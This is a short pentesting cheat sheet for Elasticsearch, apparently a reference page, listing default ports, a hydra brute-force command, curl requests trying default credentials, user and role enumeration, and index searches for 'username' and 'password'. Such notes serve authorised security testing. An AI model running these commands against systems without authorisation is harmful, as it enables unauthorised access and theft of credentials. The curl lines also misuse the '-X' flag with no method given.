Elasticsearch Pentesting

Last modified: 2023-02-05

Web

It is a search engine based on the Lucene library. Default ports are 9200, 9300.

Enumeration

Brute Force Credentials

Crack the "Authorization" header in the web page.

hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

Access over HTTP

Elasticsearch uses HTTP.

# Basic
curl -X http://10.0.0.1:9200/

# Default credentials
curl -X http://admin:elasticadmin@10.0.0.1:9200/
curl -X http://elastic:changeme@10.0.0.1:9200/


# User Enumeration
curl -X http://10.0.0.1:9200/_security/role
curl -X http://10.0.0.1:9200/_security/user

curl -X http://10.0.0.1:9200/_xpack/security/user

# Search
curl -X http://10.0.0.1:9200/_search?q=username
curl -X http://10.0.0.1:9200/_search?q=password

# Others
curl -X http://10.0.0.1:9200/_cat/
curl -X http://10.0.0.1:9200/_cluster/
curl -X http://10.0.0.1:9200/_nodes/
curl -X http://10.0.0.1:9200/_remote/
curl -X http://10.0.0.1:9200/_security/